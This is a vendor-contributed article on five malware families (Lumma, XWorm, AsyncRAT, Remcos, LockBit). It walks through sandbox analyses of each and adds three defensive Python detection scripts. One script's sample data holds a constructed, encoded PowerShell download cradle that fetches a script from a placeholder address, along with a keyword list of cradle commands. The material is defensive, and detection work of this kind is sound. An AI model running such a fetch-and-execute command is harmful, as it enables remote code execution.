
Top 5 Malware Threats to Prepare Against in 2025

2024 had its fair share of high-profile cyber attacks, with companies as large as Dell and Ticketmaster falling victim to data breaches and other infrastructure compromises. In 2025, this trend will continue. So, to be prepared for any kind of malware attack, every organization needs to know its cyber enemy in advance. Here are five common malware families that you can start preparing to counter right now.

Lumma

Lumma is a widely available infostealer designed to harvest sensitive information. It has been openly sold on the dark web since 2022. The malware can collect and exfiltrate data from targeted applications, including login credentials, financial information, and personal details.

Lumma is updated regularly to extend its capabilities. It can log detailed information from compromised systems, such as browsing history and cryptocurrency wallet data, and it can be used to install other malicious software on infected devices. In 2024, Lumma was distributed through various methods, including fake CAPTCHA pages, torrents, and targeted phishing emails.

Analysis of a Lumma Attack

Proactive analysis of suspicious files and URLs inside a sandbox environment can help you stop a Lumma infection before it reaches production hosts.

Let's see how you can do it using ANY.RUN's cloud-based sandbox. It not only delivers definitive verdicts on malware and phishing along with actionable indicators, but also allows real-time interaction with the threat and the system.

Take a look at this analysis of a Lumma attack.

ANY.RUN lets you manually open files and launch executables

It starts with an archive that contains an executable. Once we launch the .exe file, the sandbox automatically logs all processes and network activity, showing Lumma's actions.

Suricata IDS informs us about a malicious connection to Lumma's C2 server

It connects to its command-and-control (C2) server.

Malicious process responsible for stealing data from the system

Next, it begins to collect and exfiltrate data from the machine.

You can use the IOCs extracted by the sandbox to enhance your detection systems

After finishing the analysis, we can export a report on this sample, featuring all the key indicators of compromise (IOCs) and TTPs, which can be used to enrich defenses against possible Lumma attacks in your organization.
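One way to put the exported network IOCs to work, as an added example that is not ANY.RUN's code or export format: the script below loads a constructed IOC list (the JSON layout, the domain names and the 203.0.113.45 address are assumptions made up for this example, not indicators from the session), turns each indicator into a Suricata rule for the IDS, and sweeps constructed Zeek-style dns.log lines for lookups of the domains or their subdomains. The caveat a practitioner will want: C2 domains and addresses rotate quickly, so rules built this way should carry a review date, while the TTPs in the report (the process chain, the credential-store access) outlive any single indicator.

```python
"""Turn sandbox-exported network IOCs into Suricata rules and sweep DNS logs.

Added example; not ANY.RUN's code. The IOC export layout, the indicator
values and the Zeek-style dns.log lines are all constructed for illustration.
"""
import json
from urllib.parse import urlparse

# Constructed IOC export. The field names are an assumption for this example;
# real sandbox exports use their own layout.
SAMPLE_IOC_EXPORT = json.dumps({
    "family": "Lumma",
    "domains": ["lumma-example.invalid", "cdn-update.test"],
    "ips": ["203.0.113.45"],                 # TEST-NET-3 address, constructed
    "urls": ["http://cdn-update.test/api"],
})

LOCAL_SID_BASE = 1000001  # sids 1,000,000-1,999,999 are reserved for local rules


def parse_iocs(export_text):
    """Load the export and normalise indicators (lower-case, deduplicated, sorted)."""
    data = json.loads(export_text)
    return {
        "family": data.get("family", "unknown"),
        "domains": sorted({d.lower().strip(".") for d in data.get("domains", [])}),
        "ips": sorted(set(data.get("ips", []))),
        "urls": sorted(set(data.get("urls", []))),
    }


def build_rules(iocs):
    """Emit one Suricata rule per indicator: DNS query, destination IP, HTTP URL."""
    rules, sid, fam = [], LOCAL_SID_BASE, iocs["family"]
    for d in iocs["domains"]:
        rules.append(
            f'alert dns any any -> any any (msg:"{fam} C2 domain lookup {d}"; '
            f'dns.query; content:"{d}"; nocase; sid:{sid}; rev:1;)')
        sid += 1
    for ip in iocs["ips"]:
        rules.append(
            f'alert ip $HOME_NET any -> {ip} any (msg:"{fam} C2 address {ip}"; '
            f'sid:{sid}; rev:1;)')
        sid += 1
    for u in iocs["urls"]:
        p = urlparse(u)
        path = p.path or "/"
        rules.append(
            f'alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"{fam} C2 URL {u}"; '
            f'flow:established,to_server; http.host; content:"{p.hostname}"; nocase; '
            f'http.uri; content:"{path}"; sid:{sid}; rev:1;)')
        sid += 1
    return rules


def _matches_domain(query, domains):
    # The domain itself or any subdomain; "notlumma-example.invalid" must not match.
    q = query.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in domains)


def sweep_dns_log(iocs, log_lines):
    """Retro-hunt: (ts, client, query) for every lookup of an IOC domain or subdomain."""
    hits = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        if _matches_domain(rec.get("query", ""), iocs["domains"]):
            hits.append((rec["ts"], rec["id.orig_h"], rec["query"]))
    return hits


# Constructed Zeek-style dns.log (JSON lines); not captured traffic.
SAMPLE_DNS_LOG = """
{"ts": 1735689600.1, "id.orig_h": "10.0.0.12", "query": "update.microsoft.com"}
{"ts": 1735689601.4, "id.orig_h": "10.0.0.12", "query": "api.lumma-example.invalid"}
{"ts": 1735689602.9, "id.orig_h": "10.0.0.31", "query": "CDN-UPDATE.TEST."}
{"ts": 1735689603.2, "id.orig_h": "10.0.0.31", "query": "notlumma-example.invalid"}
"""

if __name__ == "__main__":
    iocs = parse_iocs(SAMPLE_IOC_EXPORT)
    print("\n".join(build_rules(iocs)))
    for hit in sweep_dns_log(iocs, SAMPLE_DNS_LOG.splitlines()):
        print("HIT", hit)
```

The domain matcher deliberately anchors on a leading dot, so a lookalike that merely ends in the same characters is not a hit, and DNS queries are normalised (case, trailing dot) before comparison, since resolvers log them both ways.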

Try all features of ANY.RUN's Interactive Sandbox for free with a 14-day trial.

XWorm

XWorm is a remote access trojan that gives cybercriminals remote control over infected computers. First appearing in July 2022, it can collect a wide range of sensitive information, including financial details, browsing history, saved passwords, and cryptocurrency wallet data.

XWorm allows attackers to monitor victims' activities by tracking keystrokes, capturing webcam images, listening to audio input, scanning network connections, and viewing open windows. It can also access and manipulate the computer's clipboard, potentially stealing cryptocurrency wallet credentials.

In 2024, XWorm was involved in many large-scale attacks, including ones that abused Cloudflare tunnels and legitimate digital certificates.

Analysis of an XWorm Attack

Phishing emails are often the initial stage of XWorm attacks

In this attack, we can see the original phishing email, which contains a link to a Google Drive page.

A Google Drive page with a download link to a malicious archive

Once we follow the link, we are offered an archive to download, protected with a password.

Opened malicious archive with a .vbs file

The password can be found in the email; password-protecting the archive keeps mail gateways and antivirus scanners from inspecting its contents. After entering it, we can access a .vbs script inside the .zip file.

XWorm uses MSBuild.exe to persist on the system

As soon as we launch the script, the sandbox instantly detects malicious activity, which eventually leads to the deployment of XWorm on the machine.

AsyncRAT

AsyncRAT is another remote access trojan on the list. First seen in 2019, it was initially spread through spam emails, often using the COVID-19 pandemic as a lure. Since then, the malware has gained popularity and been used in various cyber attacks.

AsyncRAT has evolved over time to include a wide range of malicious capabilities. It can secretly record a victim's screen activity, log keystrokes, install additional malware, steal files, maintain a persistent presence on infected systems, disable security software, and launch denial-of-service attacks that overwhelm targeted websites.

In 2024, AsyncRAT remained a significant threat, often disguised as pirated software. It was also one of the first malware families to be distributed as part of complex attacks involving scripts generated by AI.

Analysis of an AsyncRAT Attack

The initial archive with an .exe file

In this analysis session, we can see another archive with a malicious executable inside.

A PowerShell process used for downloading a payload

Detonating the file kicks off the execution chain of AsyncRAT, which involves the use of PowerShell scripts to fetch additional files needed to complete the infection.

Once the analysis is finished, the sandbox displays the final verdict on the sample.

Remcos

Remcos is a malware that its creators market as a legitimate remote access tool. Since its release in 2019, it has been used in numerous attacks to perform a wide range of malicious activities, including stealing sensitive information, remotely controlling the system, recording keystrokes, capturing screen activity, and more.

In 2024, campaigns distributing Remcos used techniques like script-based attacks, which often start with a VBScript that launches a PowerShell script to deploy the malware, and exploited vulnerabilities like CVE-2017-11882 (the Microsoft Office Equation Editor memory corruption flaw) by leveraging malicious XML files.

Analysis of a Remcos Attack

Phishing email opened in ANY.RUN's Interactive Sandbox

In this example, we are met with another phishing email that contains a .zip attachment and the password for it.

cmd process used during the infection chain

The final payload leverages Command Prompt and Windows system processes to load and execute Remcos.

MITRE ATT&CK matrix provides a comprehensive view of the malware's techniques

The ANY.RUN sandbox maps the entire attack chain to the MITRE ATT&CK matrix for convenience.
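The XWorm, AsyncRAT and Remcos sessions above share a shape: a script host or dropped executable spawns a living-off-the-land binary (MSBuild.exe, PowerShell, cmd.exe) that does the real work. As an added example that is not ANY.RUN's code or detection logic, the script below walks Sysmon-style process-creation records (Event ID 1 field names; the records, paths, PIDs and the 198.51.100.7 address are constructed for this example) and flags three of those chains: a script host launching MSBuild.exe, PowerShell running a download cradle (including one hidden behind -EncodedCommand, which it decodes), and cmd.exe with both a script host and PowerShell above it. The two benign records at the end (an IDE calling MSBuild, an admin running Get-Process) show why parent context, not the binary name, is the signal.

```python
"""Flag the process chains seen in the XWorm, AsyncRAT and Remcos sessions
from Sysmon-style process-creation records.

Added example; not ANY.RUN's code or detection logic. Field names follow
Sysmon Event ID 1, but every record below is constructed for this example.
"""
import base64
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Fragments typical of PowerShell download cradles. Assumption: a starting
# list to tune, not a complete one.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    r"|start-bitstransfer|invoke-expression|\biex\b",
    re.IGNORECASE,
)
# -e / -enc / -EncodedCommand followed by a base64 blob
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def _base(image):
    return ntpath.basename(image).lower()


def decode_encoded_command(cmdline):
    """Plaintext of an -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def build_tree(events):
    """pid -> record, so ancestry can be walked (assumes pids are unique in the window)."""
    return {e["ProcessId"]: e for e in events}


def ancestry(tree, pid):
    """Image basenames from the process itself up to the oldest known parent."""
    chain, seen = [], set()
    while pid in tree and pid not in seen:
        seen.add(pid)
        chain.append(_base(tree[pid]["Image"]))
        pid = tree[pid]["ParentProcessId"]
    return chain


def detect(events):
    """Return (rule, pid, detail) findings for the three chains described above."""
    tree, findings = build_tree(events), []
    for e in events:
        pid, img = e["ProcessId"], _base(e["Image"])
        parents = ancestry(tree, pid)[1:]
        parent = parents[0] if parents else None
        # XWorm session: a script host launching MSBuild.exe
        if img == "msbuild.exe" and parent in SCRIPT_HOSTS:
            findings.append(("script_host_spawns_msbuild", pid, f"{parent} -> {img}"))
        # AsyncRAT session: PowerShell fetching a payload, plain or base64-encoded
        if img in SHELLS:
            cmd = e.get("CommandLine", "")
            found = set(CRADLE_RE.findall(cmd))
            decoded = decode_encoded_command(cmd)
            if decoded:
                found |= set(CRADLE_RE.findall(decoded))
            if found:
                findings.append(("powershell_download_cradle", pid,
                                 ",".join(sorted(f.lower() for f in found))))
        # Remcos session: cmd.exe with both a script host and PowerShell above it
        if img == "cmd.exe" and (set(parents) & SCRIPT_HOSTS) and (set(parents) & SHELLS):
            findings.append(("vbs_powershell_cmd_chain", pid,
                             " -> ".join(reversed(parents)) + " -> cmd.exe"))
    return findings


def _enc(ps):
    """Encode a PowerShell string the way -EncodedCommand expects (used to build the sample)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed Sysmon-style records; paths, PIDs and the 198.51.100.7 address are made up.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    # XWorm-style: .vbs from the archive -> MSBuild.exe
    {"ProcessId": 200, "ParentProcessId": 100, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\u\Downloads\invoice.vbs"'},
    {"ProcessId": 300, "ParentProcessId": 200, "Image": MSBUILD, "CommandLine": "MSBuild.exe"},
    # AsyncRAT-style: dropped .exe -> encoded PowerShell download cradle
    {"ProcessId": 400, "ParentProcessId": 100, "Image": r"C:\Users\u\Downloads\setup.exe", "CommandLine": "setup.exe"},
    {"ProcessId": 500, "ParentProcessId": 400, "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + _enc("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')")},
    # Remcos-style: .vbs -> PowerShell -> cmd.exe
    {"ProcessId": 600, "ParentProcessId": 100, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\u\AppData\Local\Temp\order.vbs"'},
    {"ProcessId": 700, "ParentProcessId": 600, "Image": PS, "CommandLine": "powershell.exe -ep bypass -f stage2.ps1"},
    {"ProcessId": 800, "ParentProcessId": 700, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c start loader.exe"},
    # Benign: an IDE calling MSBuild, an admin running Get-Process
    {"ProcessId": 900, "ParentProcessId": 100, "Image": r"C:\Program Files\devenv.exe", "CommandLine": "devenv.exe"},
    {"ProcessId": 910, "ParentProcessId": 900, "Image": MSBUILD, "CommandLine": "MSBuild.exe proj.csproj"},
    {"ProcessId": 920, "ParentProcessId": 100, "Image": PS, "CommandLine": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:28} pid={pid} {detail}")
```

The encoded-command branch matters in practice: the cradle keywords never appear in the raw command line of the AsyncRAT-style record, so a detection that only greps CommandLine misses it. Sysmon's own ParentImage field would let the first rule skip the tree walk, but the ancestry walk is what makes the multi-hop Remcos-style rule possible.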

LockBit

LockBit is a ransomware family primarily targeting Windows devices. It is considered one of the biggest ransomware threats, accounting for a substantial portion of all Ransomware-as-a-Service (RaaS) attacks. The decentralized nature of the LockBit group has allowed it to compromise numerous high-profile organizations worldwide, including the UK's Royal Mail and India's National Aerospace Laboratories (in 2024).

Law enforcement agencies have taken steps to combat the LockBit group, leading to the arrest of several developers and affiliates. Despite these efforts, the group continues to operate, with plans to release a new version, LockBit 4.0, in 2025.

Analysis of a LockBit Attack

LockBit ransomware launched in the safe environment of the ANY.RUN sandbox

Take a look at this sandbox session, showing how quickly LockBit infects a system and encrypts its files.

ANY.RUN's Interactive Sandbox lets you see static analysis of every modified file on the system

By tracking file system modifications, we can see that it modified 300 files in less than a minute.

Ransom note tells victims to contact the attackers

The malware also drops a ransom note, detailing the instructions for getting the data back.
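The 300-files-in-under-a-minute observation is itself a detection signal. As an added example that is not ANY.RUN's code or detection logic, the script below runs a sliding 60-second window over a constructed stream of file-system events (the paths, the .locked extension, the README_recover.txt note name and the thresholds are assumptions for this example) and reports the first window in which many files across many directories gain the same new extension, along with any note-like files dropped alongside. It is the kind of check an EDR or file-server canary runs; the thresholds need tuning against a site's normal save and rename rate.

```python
"""Spot a LockBit-style encryption burst in a file-system event stream.

Added example; not ANY.RUN's code or detection logic. The event stream,
paths, extension, note filename and thresholds are constructed assumptions.
"""
import collections
import ntpath

WINDOW_SECONDS = 60
MIN_RENAMES_PER_WINDOW = 100   # a sustained burst, not a user saving a few files
MIN_DISTINCT_DIRS = 5          # spread across the tree, not one folder
NOTE_HINTS = ("readme", "restore", "recover", "decrypt", "how_to")


def _ext(path):
    return ntpath.splitext(path)[1].lower()


def _looks_like_note(path):
    name = ntpath.basename(path).lower()
    return any(h in name for h in NOTE_HINTS)


def detect_encryption_burst(events):
    """Sliding window over rename events; returns the first tripped window or None.

    Trips when MIN_RENAMES_PER_WINDOW renames inside WINDOW_SECONDS all add the
    same new extension across MIN_DISTINCT_DIRS or more directories. Note-like
    files created around the window are reported alongside.
    """
    renames = sorted((e for e in events if e["op"] == "rename"), key=lambda e: e["ts"])
    window = collections.deque()
    for e in renames:
        window.append(e)
        while e["ts"] - window[0]["ts"] > WINDOW_SECONDS:
            window.popleft()
        if len(window) < MIN_RENAMES_PER_WINDOW:
            continue
        ext, count = collections.Counter(_ext(w["new_path"]) for w in window).most_common(1)[0]
        if count < MIN_RENAMES_PER_WINDOW:
            continue
        dirs = {ntpath.dirname(w["new_path"]) for w in window if _ext(w["new_path"]) == ext}
        if len(dirs) < MIN_DISTINCT_DIRS:
            continue
        lo, hi = window[0]["ts"], e["ts"] + WINDOW_SECONDS
        notes = sorted({n["path"] for n in events
                        if n["op"] == "create" and lo <= n["ts"] <= hi and _looks_like_note(n["path"])})
        return {"start": lo, "end": e["ts"], "extension": ext, "renames": count,
                "directories": len(dirs), "ransom_notes": notes}
    return None


def make_sample_events():
    """Constructed stream: a quiet hour of normal saves, then 300 renames in about 45 seconds."""
    events, base = [], 1_735_700_000.0
    for i in range(10):                      # benign: a user saving documents
        events.append({"ts": base + i * 360, "op": "rename",
                       "old_path": rf"C:\Users\u\Documents\draft{i}.tmp",
                       "new_path": rf"C:\Users\u\Documents\draft{i}.docx"})
    burst = base + 3600
    for i in range(300):                     # ransomware: every file gains .locked
        d = rf"C:\Users\u\Documents\proj{i % 12}"
        events.append({"ts": burst + i * 0.15, "op": "rename",
                       "old_path": rf"{d}\file{i}.xlsx",
                       "new_path": rf"{d}\file{i}.xlsx.locked"})
        if i % 25 == 0:                      # a note dropped in each directory it visits
            events.append({"ts": burst + i * 0.15 + 0.01, "op": "create",
                           "path": rf"{d}\README_recover.txt"})
    return events


if __name__ == "__main__":
    print(detect_encryption_burst(make_sample_events()))
```

The detector fires on the 100th rename, about fifteen seconds into the burst, which is the point: a response hook (isolating the host, snapshotting the share) has to act while most of the tree is still intact, not after the note has been written everywhere.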

Improve Your Proactive Security with ANY.RUN's Interactive Sandbox

Analyzing cyber threats proactively instead of reacting to them once they become a problem for your organization is the best course of action any business can take. Simplify it with ANY.RUN's Interactive Sandbox by examining all suspicious files and URLs inside a safe virtual environment that helps you identify malicious content with ease.

With the ANY.RUN sandbox, your company can:

  • Swiftly detect and confirm harmful files and links during scheduled checks.
  • Examine how malware operates at a deeper level to reveal its tactics and techniques.
  • Respond to security incidents more effectively by collecting critical threat insights through sandbox analysis.

Try all features of ANY.RUN with a 14-day free trial.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.


